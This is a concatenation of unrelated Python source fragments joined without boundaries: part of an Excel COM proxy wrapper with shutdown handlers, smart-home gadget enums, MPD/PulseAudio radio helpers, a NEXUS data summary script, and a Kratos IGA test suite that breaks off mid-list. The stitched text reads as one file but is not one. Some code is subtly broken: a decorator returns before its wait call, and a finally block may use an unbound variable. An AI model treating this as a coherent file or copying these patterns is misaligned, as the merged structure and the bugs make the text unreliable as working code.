DefaultTableStyle = ProxyProperty('wb.DefaultTableStyle') DefaultTimelineStyle = ProxyProperty('wb.DefaultTimelineStyle') DisplayDrawingObjects = ProxyProperty('wb.DisplayDrawingObjects') DisplayInkComments = ProxyProperty('wb.DisplayInkComments') DocumentInspectors = ProxyProperty('wb.DocumentInspectors') DocumentLibraryVersions = ProxyProperty('wb.DocumentLibraryVersions') DoNotPromptForConvert = ProxyProperty('wb.DoNotPromptForConvert') EnableAutoRecover = ProxyProperty('wb.EnableAutoRecover') EncryptionProvider = ProxyProperty('wb.EncryptionProvider') EnvelopeVisible = ProxyProperty('wb.EnvelopeVisible') Excel4IntlMacroSheets = ProxyProperty('wb.Excel4IntlMacroSheets') Excel4MacroSheets = ProxyProperty('wb.Excel4MacroSheets') Excel8CompatibilityMode = ProxyProperty('wb.Excel8CompatibilityMode') FileFormat = ProxyProperty('wb.FileFormat') Final = ProxyProperty('wb.Final') ForceFullCalculation = ProxyProperty('wb.ForceFullCalculation') FullName = ProxyProperty('wb.FullName') FullNameURLEncoded = ProxyProperty('wb.FullNameURLEncoded') HasPassword = ProxyProperty('wb.HasPassword') HasVBProject = ProxyProperty('wb.HasVBProject') HighlightChangesOnScreen = ProxyProperty('wb.HighlightChangesOnScreen') IconSets = ProxyProperty('wb.IconSets') InactiveListBorderVisible = ProxyProperty('wb.InactiveListBorderVisible') IsAddin = ProxyProperty('wb.IsAddin') IsInplace = ProxyProperty('wb.IsInplace') KeepChangeHistory = ProxyProperty('wb.KeepChangeHistory') ListChangesOnNewSheet = ProxyProperty('wb.ListChangesOnNewSheet') Mailer = ProxyProperty('wb.Mailer') Model = ProxyProperty('wb.Model') MultiUserEditing = ProxyProperty('wb.MultiUserEditing') Name = ProxyProperty('wb.Name') Names = ProxyProperty('wb.Names') Parent = ProxyProperty('wb.Parent') Password = ProxyProperty('wb.Password') PasswordEncryptionAlgorithm = ProxyProperty('wb.PasswordEncryptionAlgorithm') PasswordEncryptionFileProperties = ProxyProperty('wb.PasswordEncryptionFileProperties') PasswordEncryptionKeyLength = ProxyProperty('wb.PasswordEncryptionKeyLength') PasswordEncryptionProvider = ProxyProperty('wb.PasswordEncryptionProvider') Path = ProxyProperty('wb.Path') Permission = ProxyProperty('wb.Permission') PersonalViewListSettings = ProxyProperty('wb.PersonalViewListSettings') PersonalViewPrintSettings = ProxyProperty('wb.PersonalViewPrintSettings') PivotTables = ProxyProperty('wb.PivotTables') PrecisionAsDisplayed = ProxyProperty('wb.PrecisionAsDisplayed') ProtectStructure = ProxyProperty('wb.ProtectStructure') ProtectWindows = ProxyProperty('wb.ProtectWindows') PublishObjects = ProxyProperty('wb.PublishObjects') Queries = ProxyProperty('wb.Queries') ReadOnly = ProxyProperty('wb.ReadOnly') ReadOnlyRecommended = ProxyProperty('wb.ReadOnlyRecommended') RemovePersonalInformation = ProxyProperty('wb.RemovePersonalInformation') Research = ProxyProperty('wb.Research') RevisionNumber = ProxyProperty('wb.RevisionNumber') Saved = ProxyProperty('wb.Saved') SaveLinkValues = ProxyProperty('wb.SaveLinkValues') ServerPolicy = ProxyProperty('wb.ServerPolicy') ServerViewableItems = ProxyProperty('wb.ServerViewableItems') SharedWorkspace = ProxyProperty('wb.SharedWorkspace') # Sheets = ProxyProperty('wb.Sheets') ShowConflictHistory = ProxyProperty('wb.ShowConflictHistory') ShowPivotChartActiveFields = ProxyProperty('wb.ShowPivotChartActiveFields') ShowPivotTableFieldList = ProxyProperty('wb.ShowPivotTableFieldList') Signatures = ProxyProperty('wb.Signatures') SlicerCaches = ProxyProperty('wb.SlicerCaches') SmartDocument = ProxyProperty('wb.SmartDocument') Styles = ProxyProperty('wb.Styles') Sync = ProxyProperty('wb.Sync') TableStyles = ProxyProperty('wb.TableStyles') TemplateRemoveExtData = ProxyProperty('wb.TemplateRemoveExtData') Theme = ProxyProperty('wb.Theme') UpdateLinks = ProxyProperty('wb.UpdateLinks') UpdateRemoteReferences = ProxyProperty('wb.UpdateRemoteReferences') UserStatus = ProxyProperty('wb.UserStatus') UseWholeCellCriteria = ProxyProperty('wb.UseWholeCellCriteria') UseWildcards = ProxyProperty('wb.UseWildcards') VBASigned = ProxyProperty('wb.VBASigned') VBProject = ProxyProperty('wb.VBProject') WebOptions = ProxyProperty('wb.WebOptions') Windows = ProxyProperty('wb.Windows') Worksheets = ProxyProperty('wb.Worksheets') WritePassword = ProxyProperty('wb.WritePassword') WriteReserved = ProxyProperty('wb.WriteReserved') WriteReservedBy = ProxyProperty('wb.WriteReservedBy') XmlMaps = ProxyProperty('wb.XmlMaps') XmlNamespaces = ProxyProperty('wb.XmlNamespaces') # ===== Application Methods ===== https://docs.microsoft.com/en-us/office/vba/api/excel.application(object) ActivateMicrosoftApp = ProxyMethod('xl.ActivateMicrosoftApp', setter_error=METHOD_SETTER_ERROR) AddCustomList = ProxyMethod('xl.AddCustomList', setter_error=METHOD_SETTER_ERROR) Calculate = ProxyMethod('xl.Calculate', setter_error=METHOD_SETTER_ERROR) CalculateFull = ProxyMethod('xl.CalculateFull', setter_error=METHOD_SETTER_ERROR) CalculateFullRebuild = ProxyMethod('xl.CalculateFullRebuild', setter_error=METHOD_SETTER_ERROR) CalculateUntilAsyncQueriesDone = ProxyMethod('xl.CalculateUntilAsyncQueriesDone', setter_error=METHOD_SETTER_ERROR) CentimetersToPoints = ProxyMethod('xl.CentimetersToPoints', setter_error=METHOD_SETTER_ERROR) CheckAbort = ProxyMethod('xl.CheckAbort', setter_error=METHOD_SETTER_ERROR) CheckSpelling = ProxyMethod('xl.CheckSpelling', setter_error=METHOD_SETTER_ERROR) ConvertFormula = ProxyMethod('xl.ConvertFormula', setter_error=METHOD_SETTER_ERROR) DDEExecute = ProxyMethod('xl.DDEExecute', setter_error=METHOD_SETTER_ERROR) DDEInitiate = ProxyMethod('xl.DDEInitiate', setter_error=METHOD_SETTER_ERROR) DDEPoke = ProxyMethod('xl.DDEPoke', setter_error=METHOD_SETTER_ERROR) DDERequest = ProxyMethod('xl.DDERequest', setter_error=METHOD_SETTER_ERROR) DDETerminate = ProxyMethod('xl.DDETerminate', setter_error=METHOD_SETTER_ERROR) DeleteCustomList = ProxyMethod('xl.DeleteCustomList', setter_error=METHOD_SETTER_ERROR) DisplayXMLSourcePane = ProxyMethod('xl.DisplayXMLSourcePane', setter_error=METHOD_SETTER_ERROR) DoubleClick = ProxyMethod('xl.DoubleClick', setter_error=METHOD_SETTER_ERROR) Evaluate = ProxyMethod('xl.Evaluate', setter_error=METHOD_SETTER_ERROR) ExecuteExcel4Macro = ProxyMethod('xl.ExecuteExcel4Macro', setter_error=METHOD_SETTER_ERROR) FindFile = ProxyMethod('xl.FindFile', setter_error=METHOD_SETTER_ERROR) GetCustomListContents = ProxyMethod('xl.GetCustomListContents', setter_error=METHOD_SETTER_ERROR) GetCustomListNum = ProxyMethod('xl.GetCustomListNum', setter_error=METHOD_SETTER_ERROR) GetOpenFilename = ProxyMethod('xl.GetOpenFilename', setter_error=METHOD_SETTER_ERROR) GetPhonetic = ProxyMethod('xl.GetPhonetic', setter_error=METHOD_SETTER_ERROR) GetSaveAsFilename = ProxyMethod('xl.GetSaveAsFilename', setter_error=METHOD_SETTER_ERROR) Goto = ProxyMethod('xl.Goto', setter_error=METHOD_SETTER_ERROR) Help = ProxyMethod('xl.Help', setter_error=METHOD_SETTER_ERROR) InchesToPoints = ProxyMethod('xl.InchesToPoints', setter_error=METHOD_SETTER_ERROR) InputBox = ProxyMethod('xl.InputBox', setter_error=METHOD_SETTER_ERROR) Intersect = ProxyMethod('xl.Intersect', setter_error=METHOD_SETTER_ERROR) MacroOptions = ProxyMethod('xl.MacroOptions', setter_error=METHOD_SETTER_ERROR) MailLogoff = ProxyMethod('xl.MailLogoff', setter_error=METHOD_SETTER_ERROR) MailLogon = ProxyMethod('xl.MailLogon', setter_error=METHOD_SETTER_ERROR) NextLetter = ProxyMethod('xl.NextLetter', setter_error=METHOD_SETTER_ERROR) OnKey = ProxyMethod('xl.OnKey', setter_error=METHOD_SETTER_ERROR) OnRepeat = ProxyMethod('xl.OnRepeat', setter_error=METHOD_SETTER_ERROR) OnTime = ProxyMethod('xl.OnTime', setter_error=METHOD_SETTER_ERROR) OnUndo = ProxyMethod('xl.OnUndo', setter_error=METHOD_SETTER_ERROR) Quit = ProxyMethod('xl.Quit', setter_error=METHOD_SETTER_ERROR) RecordMacro = ProxyMethod('xl.RecordMacro', setter_error=METHOD_SETTER_ERROR) RegisterXLL = ProxyMethod('xl.RegisterXLL', setter_error=METHOD_SETTER_ERROR) Repeat = ProxyMethod('xl.Repeat', setter_error=METHOD_SETTER_ERROR) Run = ProxyMethod('xl.Run', setter_error=METHOD_SETTER_ERROR) SendKeys = ProxyMethod('xl.SendKeys', setter_error=METHOD_SETTER_ERROR) SharePointVersion = ProxyMethod('xl.SharePointVersion', setter_error=METHOD_SETTER_ERROR) Undo = ProxyMethod('xl.Undo', setter_error=METHOD_SETTER_ERROR) Union = ProxyMethod('xl.Union', setter_error=METHOD_SETTER_ERROR) Volatile = ProxyMethod('xl.Volatile', setter_error=METHOD_SETTER_ERROR) Wait = ProxyMethod('xl.Wait', setter_error=METHOD_SETTER_ERROR) # ===== Application Properties ===== https://docs.microsoft.com/en-us/office/vba/api/excel.application(object) ActiveCell = ProxyProperty('xl.ActiveCell') # ActiveChart = ProxyProperty('xl.ActiveChart') ActiveEncryptionSession = ProxyProperty('xl.ActiveEncryptionSession') ActivePrinter = ProxyProperty('xl.ActivePrinter') ActiveProtectedViewWindow = ProxyProperty('xl.ActiveProtectedViewWindow') # ActiveSheet = ProxyProperty('xl.ActiveSheet') ActiveWindow = ProxyProperty('xl.ActiveWindow') ActiveWorkbook = ProxyProperty('xl.ActiveWorkbook') AddIns = ProxyProperty('xl.AddIns') AddIns2 = ProxyProperty('xl.AddIns2') AlertBeforeOverwriting = ProxyProperty('xl.AlertBeforeOverwriting') AltStartupPath = ProxyProperty('xl.AltStartupPath') AlwaysUseClearType = ProxyProperty('xl.AlwaysUseClearType') # Application = ProxyProperty('xl.Application') ArbitraryXMLSupportAvailable = ProxyProperty('xl.ArbitraryXMLSupportAvailable') AskToUpdateLinks = ProxyProperty('xl.AskToUpdateLinks') Assistance = ProxyProperty('xl.Assistance') AutoCorrect = ProxyProperty('xl.AutoCorrect') AutoFormatAsYouTypeReplaceHyperlinks = ProxyProperty('xl.AutoFormatAsYouTypeReplaceHyperlinks') AutomationSecurity = ProxyProperty('xl.AutomationSecurity') AutoPercentEntry = ProxyProperty('xl.AutoPercentEntry') AutoRecover = ProxyProperty('xl.AutoRecover') Build = ProxyProperty('xl.Build') CalculateBeforeSave = ProxyProperty('xl.CalculateBeforeSave') Calculation = ProxyProperty('xl.Calculation') CalculationInterruptKey = ProxyProperty('xl.CalculationInterruptKey') CalculationState = ProxyProperty('xl.CalculationState') # CalculationVersion = ProxyProperty('xl.CalculationVersion') Caller = ProxyProperty('xl.Caller') CanPlaySounds = ProxyProperty('xl.CanPlaySounds') CanRecordSounds = ProxyProperty('xl.CanRecordSounds') Caption = ProxyProperty('xl.Caption') CellDragAndDrop = ProxyProperty('xl.CellDragAndDrop') Cells = ProxyProperty('xl.Cells') # ChartDataPointTrack = ProxyProperty('xl.ChartDataPointTrack') # Charts = ProxyProperty('xl.Charts') ClipboardFormats = ProxyProperty('xl.ClipboardFormats') ClusterConnector = ProxyProperty('xl.ClusterConnector') Columns = ProxyProperty('xl.Columns') COMAddIns = ProxyProperty('xl.COMAddIns') # CommandBars = ProxyProperty('xl.CommandBars') CommandUnderlines = ProxyProperty('xl.CommandUnderlines') ConstrainNumeric = ProxyProperty('xl.ConstrainNumeric') ControlCharacters = ProxyProperty('xl.ControlCharacters') CopyObjectsWithCells = ProxyProperty('xl.CopyObjectsWithCells') # Creator = ProxyProperty('xl.Creator') Cursor = ProxyProperty('xl.Cursor') CursorMovement = ProxyProperty('xl.CursorMovement') CustomListCount = ProxyProperty('xl.CustomListCount') CutCopyMode = ProxyProperty('xl.CutCopyMode') DataEntryMode = ProxyProperty('xl.DataEntryMode') DDEAppReturnCode = ProxyProperty('xl.DDEAppReturnCode') DecimalSeparator = ProxyProperty('xl.DecimalSeparator') DefaultFilePath = ProxyProperty('xl.DefaultFilePath') DefaultSaveFormat = ProxyProperty('xl.DefaultSaveFormat') DefaultSheetDirection = ProxyProperty('xl.DefaultSheetDirection') DefaultWebOptions = ProxyProperty('xl.DefaultWebOptions') DeferAsyncQueries = ProxyProperty('xl.DeferAsyncQueries') Dialogs = ProxyProperty('xl.Dialogs') DisplayAlerts = ProxyProperty('xl.DisplayAlerts') DisplayClipboardWindow = ProxyProperty('xl.DisplayClipboardWindow') DisplayCommentIndicator = ProxyProperty('xl.DisplayCommentIndicator') DisplayDocumentActionTaskPane = ProxyProperty('xl.DisplayDocumentActionTaskPane') DisplayDocumentInformationPanel = ProxyProperty('xl.DisplayDocumentInformationPanel') DisplayExcel4Menus = ProxyProperty('xl.DisplayExcel4Menus') DisplayFormulaAutoComplete = ProxyProperty('xl.DisplayFormulaAutoComplete') DisplayFormulaBar = ProxyProperty('xl.DisplayFormulaBar') DisplayFullScreen = ProxyProperty('xl.DisplayFullScreen') DisplayFunctionToolTips = ProxyProperty('xl.DisplayFunctionToolTips') DisplayInsertOptions = ProxyProperty('xl.DisplayInsertOptions') DisplayNoteIndicator = ProxyProperty('xl.DisplayNoteIndicator') DisplayPasteOptions = ProxyProperty('xl.DisplayPasteOptions') DisplayRecentFiles = ProxyProperty('xl.DisplayRecentFiles') DisplayScrollBars = ProxyProperty('xl.DisplayScrollBars') DisplayStatusBar = ProxyProperty('xl.DisplayStatusBar') EditDirectlyInCell = ProxyProperty('xl.EditDirectlyInCell') EnableAnimations = ProxyProperty('xl.EnableAnimations') EnableAutoComplete = ProxyProperty('xl.EnableAutoComplete') EnableCancelKey = ProxyProperty('xl.EnableCancelKey') EnableCheckFileExtensions = ProxyProperty('xl.EnableCheckFileExtensions') EnableEvents = ProxyProperty('xl.EnableEvents') EnableLargeOperationAlert = ProxyProperty('xl.EnableLargeOperationAlert') EnableLivePreview = ProxyProperty('xl.EnableLivePreview') EnableMacroAnimations = ProxyProperty('xl.EnableMacroAnimations') EnableSound = ProxyProperty('xl.EnableSound') ErrorCheckingOptions = ProxyProperty('xl.ErrorCheckingOptions') # Excel4IntlMacroSheets = ProxyProperty('xl.Excel4IntlMacroSheets') # Excel4MacroSheets = ProxyProperty('xl.Excel4MacroSheets') ExtendList = ProxyProperty('xl.ExtendList') FeatureInstall = ProxyProperty('xl.FeatureInstall') FileConverters = ProxyProperty('xl.FileConverters') FileDialog = ProxyProperty('xl.FileDialog') FileExportConverters = ProxyProperty('xl.FileExportConverters') FileValidation = ProxyProperty('xl.FileValidation') FileValidationPivot = ProxyProperty('xl.FileValidationPivot') FindFormat = ProxyProperty('xl.FindFormat') FixedDecimal = ProxyProperty('xl.FixedDecimal') FixedDecimalPlaces = ProxyProperty('xl.FixedDecimalPlaces') FlashFill = ProxyProperty('xl.FlashFill') FlashFillMode = ProxyProperty('xl.FlashFillMode') FormulaBarHeight = ProxyProperty('xl.FormulaBarHeight') GenerateGetPivotData = ProxyProperty('xl.GenerateGetPivotData') GenerateTableRefs = ProxyProperty('xl.GenerateTableRefs') Height = ProxyProperty('xl.Height') HighQualityModeForGraphics = ProxyProperty('xl.HighQualityModeForGraphics') Hinstance = ProxyProperty('xl.Hinstance') HinstancePtr = ProxyProperty('xl.HinstancePtr') Hwnd = ProxyProperty('xl.Hwnd') IgnoreRemoteRequests = ProxyProperty('xl.IgnoreRemoteRequests') Interactive = ProxyProperty('xl.Interactive') International = ProxyProperty('xl.International') IsSandboxed = ProxyProperty('xl.IsSandboxed') Iteration = ProxyProperty('xl.Iteration') LanguageSettings = ProxyProperty('xl.LanguageSettings') LargeOperationCellThousandCount = ProxyProperty('xl.LargeOperationCellThousandCount') Left = ProxyProperty('xl.Left') LibraryPath = ProxyProperty('xl.LibraryPath') MailSession = ProxyProperty('xl.MailSession') MailSystem = ProxyProperty('xl.MailSystem') MapPaperSize = ProxyProperty('xl.MapPaperSize') MathCoprocessorAvailable = ProxyProperty('xl.MathCoprocessorAvailable') MaxChange = ProxyProperty('xl.MaxChange') MaxIterations = ProxyProperty('xl.MaxIterations') MeasurementUnit = ProxyProperty('xl.MeasurementUnit') MergeInstances = ProxyProperty('xl.MergeInstances') MouseAvailable = ProxyProperty('xl.MouseAvailable') MoveAfterReturn = ProxyProperty('xl.MoveAfterReturn') MoveAfterReturnDirection = ProxyProperty('xl.MoveAfterReturnDirection') MultiThreadedCalculation = ProxyProperty('xl.MultiThreadedCalculation') # Name = ProxyProperty('xl.Name') # Names = ProxyProperty('xl.Names') NetworkTemplatesPath = ProxyProperty('xl.NetworkTemplatesPath') NewWorkbook = ProxyProperty('xl.NewWorkbook') ODBCErrors = ProxyProperty('xl.ODBCErrors') ODBCTimeout = ProxyProperty('xl.ODBCTimeout') OLEDBErrors = ProxyProperty('xl.OLEDBErrors') OnWindow = ProxyProperty('xl.OnWindow') OperatingSystem = ProxyProperty('xl.OperatingSystem') OrganizationName = ProxyProperty('xl.OrganizationName') # Parent = ProxyProperty('xl.Parent') # Path = ProxyProperty('xl.Path') PathSeparator = ProxyProperty('xl.PathSeparator') PivotTableSelection = ProxyProperty('xl.PivotTableSelection') PreviousSelections = ProxyProperty('xl.PreviousSelections') PrintCommunication = ProxyProperty('xl.PrintCommunication') ProductCode = ProxyProperty('xl.ProductCode') PromptForSummaryInfo = ProxyProperty('xl.PromptForSummaryInfo') ProtectedViewWindows = ProxyProperty('xl.ProtectedViewWindows') QuickAnalysis = ProxyProperty('xl.QuickAnalysis') Range = ProxyProperty('xl.Range') Ready = ProxyProperty('xl.Ready') RecentFiles = ProxyProperty('xl.RecentFiles') RecordRelative = ProxyProperty('xl.RecordRelative') ReferenceStyle = ProxyProperty('xl.ReferenceStyle') RegisteredFunctions = ProxyProperty('xl.RegisteredFunctions') ReplaceFormat = ProxyProperty('xl.ReplaceFormat') RollZoom = ProxyProperty('xl.RollZoom') Rows = ProxyProperty('xl.Rows') RTD = ProxyProperty('xl.RTD') ScreenUpdating = ProxyProperty('xl.ScreenUpdating') Selection = ProxyProperty('xl.Selection') # Sheets = ProxyProperty('xl.Sheets') SheetsInNewWorkbook = ProxyProperty('xl.SheetsInNewWorkbook') ShowChartTipNames = ProxyProperty('xl.ShowChartTipNames') ShowChartTipValues = ProxyProperty('xl.ShowChartTipValues') ShowDevTools = ProxyProperty('xl.ShowDevTools') ShowMenuFloaties = ProxyProperty('xl.ShowMenuFloaties') ShowQuickAnalysis = ProxyProperty('xl.ShowQuickAnalysis') ShowSelectionFloaties = ProxyProperty('xl.ShowSelectionFloaties') ShowStartupDialog = ProxyProperty('xl.ShowStartupDialog') ShowToolTips = ProxyProperty('xl.ShowToolTips') SmartArtColors = ProxyProperty('xl.SmartArtColors') SmartArtLayouts = ProxyProperty('xl.SmartArtLayouts') SmartArtQuickStyles = ProxyProperty('xl.SmartArtQuickStyles') Speech = ProxyProperty('xl.Speech') SpellingOptions = ProxyProperty('xl.SpellingOptions') StandardFont = ProxyProperty('xl.StandardFont') StandardFontSize = ProxyProperty('xl.StandardFontSize') StartupPath = ProxyProperty('xl.StartupPath') StatusBar = ProxyProperty('xl.StatusBar') TemplatesPath = ProxyProperty('xl.TemplatesPath') ThisCell = ProxyProperty('xl.ThisCell') ThisWorkbook = ProxyProperty('xl.ThisWorkbook') ThousandsSeparator = ProxyProperty('xl.ThousandsSeparator') Top = ProxyProperty('xl.Top') TransitionMenuKey = ProxyProperty('xl.TransitionMenuKey') TransitionMenuKeyAction = ProxyProperty('xl.TransitionMenuKeyAction') TransitionNavigKeys = ProxyProperty('xl.TransitionNavigKeys') UsableHeight = ProxyProperty('xl.UsableHeight') UsableWidth = ProxyProperty('xl.UsableWidth') UseClusterConnector = ProxyProperty('xl.UseClusterConnector') UsedObjects = ProxyProperty('xl.UsedObjects') UserControl = ProxyProperty('xl.UserControl') UserLibraryPath = ProxyProperty('xl.UserLibraryPath') UserName = ProxyProperty('xl.UserName') UseSystemSeparators = ProxyProperty('xl.UseSystemSeparators') Value = ProxyProperty('xl.Value') VBE = ProxyProperty('xl.VBE') Version = ProxyProperty('xl.Version') Visible = ProxyProperty('xl.Visible') WarnOnFunctionNameConflict = ProxyProperty('xl.WarnOnFunctionNameConflict') Watches = ProxyProperty('xl.Watches') Width = ProxyProperty('xl.Width') # Windows = ProxyProperty('xl.Windows') WindowsForPens = ProxyProperty('xl.WindowsForPens') WindowState = ProxyProperty('xl.WindowState') Workbooks = ProxyProperty('xl.Workbooks') WorksheetFunction = ProxyProperty('xl.WorksheetFunction') # Worksheets = ProxyProperty('xl.Worksheets') SHOULD_INIT_SIGNAL = True def should_init_sig(): """Return if init_sig_shutdown should be called on first Excel creation. This will set the SIGTERM and SIGINT handlers to call "shutdown" and close all Excel Applications run by this process. """ global SHOULD_INIT_SIGNAL return SHOULD_INIT_SIGNAL def set_init_sig(value): """Set if init_sig_shutdown should be called on first Excel creation. This will set the SIGTERM and SIGINT handlers to call "shutdown" and close all Excel Applications run by this process. """ global SHOULD_INIT_SIGNAL SHOULD_INIT_SIGNAL = value def init_sig_shutdown(func=None): """Set the SIGTERM and SIGINT handlers to call "shutdown" and close all Excel Applications run by this process.""" if func is None: func = shutdown signal.signal(signal.SIGTERM, func) signal.signal(signal.SIGINT, func) def shutdown(*args, sys_exit=True, **kwargs): """Close all Excel Applications run by this process.""" for excel in Excel.GLOBAL_EXCELS: try: excel.Quit() except (AttributeError, ValueError, TypeError, Excel): pass if sys_exit: sys.exit(-1) # Automatically register the shutdown function with atexit atexit.register(shutdown, sys_exit=False) """Collection of constants for all gadgets and characteristics""" # This file was generated by 'gadget_constants_exporter.py' at 'https://github.com/johannesgrothe/Smarthome_System' # Do not modify this file, modify 'gadget_docs/gadget_specs.json' and export. # Every change made will be overwritten at next export. import enum class CharacteristicIdentifier(enum.IntEnum): """Characteristics Gadgets can contain""" err_type = 0 # Error-Characteristic status = 1 # Status fan_speed = 2 # Fan Speed brightness = 3 # Brightness hue = 4 # Hue saturation = 5 # Saturation temperature = 6 # Temperature humidity = 7 # Humidity class GadgetIdentifier(enum.IntEnum): """Gadgets running on the ESP Clients""" any_gadget = 0 # Any Gadget lamp_neopixel_rgb_basic = 1 # NeoPixel Basic RGB Lamp lamp_basic = 2 # Basic Lamp fan_westinghouse_ir = 3 # Westinghouse IR Fan lamp_westinghouse_ir = 4 # Westinghouse IR Fan Lamp doorbell_basic = 5 # Doorbell Basic wallswitch_basic = 6 # Basic Wallswitch sensor_motion_hr501 = 7 # HR501 Motion Sensor sensor_temperature_dht = 8 # DHT Temperature/Humidity Sensor class BridgeGadgetIdentifier(enum.IntEnum): """Gadgets running on the Bridge itself (virtual Gadgets)""" """Helper functions for the controllers.""" from contextlib import contextmanager from functools import wraps import netifaces import pulsectl import simpleaudio as sa from mpd import MPDClient SLEEP_TIMER_SOUND = "/usr/local/lib/radio-interface/sleep-timer.wav" MPD_HOST, MPD_PORT = "localhost", 6600 def notify(function): """ Play a sound to inform the user that an action has been registered. To be used as a decorator. """ @wraps(function) def wrapper(*args, **kwargs): sleep_timer_sound = sa.WaveObject.from_wave_file(SLEEP_TIMER_SOUND) notification = sleep_timer_sound.play() return function(*args, **kwargs) notification.wait_done() return wrapper @contextmanager def connection_to_mpd(): """Context manager to establish the connection with MPD.""" mpd = MPDClient() try: mpd.timeout = 10 mpd.idletimeout = None mpd.connect(MPD_HOST, MPD_PORT) yield mpd finally: mpd.close() mpd.disconnect() @contextmanager def connection_to_pulseaudio(max_volume): """Context manager to establish a connection with Pulse Audio. Should be used each time getting the volume is necessary since the client is not synchronized when the volume is changed on another client. That is necessary for instance when changing the volume as the current volume is needed in order to apply a change. We also make sure we don't go above the maximum audio volume threshold set in the audio module. """ try: pulse_client = pulsectl.Pulse("radio-interface") pulse_sink = pulse_client.sink_list()[0] yield {"client": pulse_client, "sink": pulse_sink} finally: if pulse_client.volume_get_all_chans(pulse_sink) > max_volume: pulse_client.volume_set_all_chans(pulse_sink, max_volume) pulse_client.close() def local_ip_address() -> str: """Return local IP address.""" ip_address = netifaces.ifaddresses("wlan0") ip_address = ip_address[netifaces.AF_INET] ip_address = ip_address[0].get("addr") return ip_address def playing(content: str) -> str: """Fetch the currently playing content. Available content is: - name - album - artist - title """ with connection_to_mpd() as mpd: playing = mpd.currentsong() return playing.get(content) #!/usr/bin/env python3 #coding=utf-8 """ Small script intended to summarise the test data files outside the ratecounter framework (for setting up test cases only). """ from collections import Counter from nexus import NexusReader if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='Does something.') parser.add_argument("filename", help='filename') args = parser.parse_args() nex = NexusReader(args.filename) patterns = Counter() for char_id in nex.data.characters: p = "".join([ nex.data.characters[char_id]['A'], nex.data.characters[char_id]['B'], nex.data.characters[char_id]['F'], ]) patterns[p] += 1 for p in patterns.most_common(): print(p) print(sum(patterns.values())) # import Kratos from KratosMultiphysics import * from KratosMultiphysics.IgaApplication import * import run_cpp_unit_tests import KratosMultiphysics.kratos_utilities as kratos_utilities # Import Kratos "wrapper" for unittests import KratosMultiphysics.KratosUnittest as KratosUnittest # Import Iga test factory tests from iga_test_factory import SinglePatchTest as SinglePatchTest # Truss tests - python based from truss_element_tests import TrussElementTests as TTrussElementTests # Membrane tests from iga_test_factory import MembraneSinglePatchFourPointSailLinearStatic as MembraneSinglePatchFourPointSailLinearStatic from iga_test_factory import MembraneSinglePatchFourPointSailNonLinearStatic as MembraneSinglePatchFourPointSailNonLinearStatic from iga_test_factory import MembraneSinglePatchFourPointSailImplicitDynamic as MembraneSinglePatchFourPointSailImplicitDynamic # 3p Shell KL - python based from shell_3p_element_tests import Shell3pElementTests as TShell3pElementTests # 3p Shell KL from iga_test_factory import ScordelisRoofShell3pTest as ScordelisRoofShell3pTest from iga_test_factory import LinearBeamShell3pTest as LinearBeamShell3pTest # 5p Shell Hierarchic from iga_test_factory import Shell5pHierarchicLinearThickBeamTest as TShell5pHierarchicLinearThickBeamTest from iga_test_factory import Shell5pHierarchicLinearScordelisTest as TShell5pHierarchicLinearScordelisTest from iga_test_factory import Shell5pHierarchicNonLinearThickBeamTest as TShell5pHierarchicNonLinearThickBeamTest # 5p Shell from iga_test_factory import ScordelisRoofShell5pTest as ScordelisRoofShell5pTest # Weak support tests from iga_test_factory import SinglePatchRefinedSupportPenaltyTest as SinglePatchRefinedSupportPenaltyTest from iga_test_factory import SinglePatchRefinedSupportLagrangeTest as SinglePatchRefinedSupportLagrangeTest from iga_test_factory import SinglePatchRefinedSupportNitscheTest as SinglePatchRefinedSupportNitscheTest # Coupling/C_0 tests from iga_test_factory import TwoPatchCouplingPenaltyShell3pTest as TwoPatchCouplingPenaltyShell3pTest from iga_test_factory import TwoPatchCouplingLagrangeShell3pTest as TwoPatchCouplingLagrangeShell3pTest from iga_test_factory import TwoPatchCouplingNitscheShell3pTest as TwoPatchCouplingNitscheShell3pTest from iga_test_factory import TwoPatchRefinedCouplingPenaltyMembraneTest as TwoPatchRefinedCouplingPenaltyMembraneTest from iga_test_factory import TwoPatchRefinedCouplingLagrangeMembraneTest as TwoPatchRefinedCouplingLagrangeMembraneTest from iga_test_factory import TwoPatchRefinedCouplingNitscheMembraneTest as TwoPatchRefinedCouplingNitscheMembraneTest # Rotation/G_1 coupling tests from iga_test_factory import TwoPatchCantileverCouplingPenaltyTest as TwoPatchCantileverCouplingPenaltyTest from iga_test_factory import TwoPatchCantileverRefinedCouplingPenaltyTest as TwoPatchCantileverRefinedCouplingPenaltyTest # Nurbs Volume tests from test_nurbs_volume_element import TestNurbsVolumeElement as TTestNurbsVolumeElements # Modelers tests from test_modelers import TestModelers as TTestModelers has_linear_solvers_application = kratos_utilities.CheckIfApplicationsAvailable("LinearSolversApplication") def AssembleTestSuites(): ''' Populates the test suites to run. Populates the test suites to run. At least, it should pupulate the suites: "small", "nighlty" and "all" Return ------ suites: A dictionary of suites The set of suites with its test_cases added. ''' suites = KratosUnittest.KratosSuites smallSuite = suites['small'] smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([ # Single patch test - checks iga essentials SinglePatchTest, # Truss tests TTrussElementTests, # Membrane tests MembraneSinglePatchFourPointSailLinearStatic, MembraneSinglePatchFourPointSailNonLinearStatic, # 3p Shell KL TShell3pElementTests, ScordelisRoofShell3pTest, LinearBeamShell3pTest, # 5p Shell Director ScordelisRoofShell5pTest, # Weak support tests SinglePatchRefinedSupportPenaltyTest, SinglePatchRefinedSupportLagrangeTest, # Coupling tests TwoPatchCouplingPenaltyShell3pTest, TwoPatchCouplingLagrangeShell3pTest, TwoPatchRefinedCouplingPenaltyMembraneTest, TwoPatchRefinedCouplingLagrangeMembraneTest, # Rotation/G_1 coupling tests TwoPatchCantileverCouplingPenaltyTest, TwoPatchCantileverRefinedCouplingPenaltyTest, # Volumes TTestNurbsVolumeElements, # Modelers TTestModelers ])) if has_linear_solvers_application: from KratosMultiphysics import LinearSolversApplication if LinearSolversApplication.HasFEAST(): smallSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([ # Weak support Nitsche test SinglePatchRefinedSupportNitscheTest, # Coupling Nitsche tests TwoPatchCouplingNitscheShell3pTest, TwoPatchRefinedCouplingNitscheMembraneTest ])) else: print("FEAST not available in LinearSolversApplication") nightSuite = suites['nightly'] nightSuite.addTests(smallSuite) nightSuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([ # Membrane tests MembraneSinglePatchFourPointSailImplicitDynamic, # 5p Shell Hierarchic 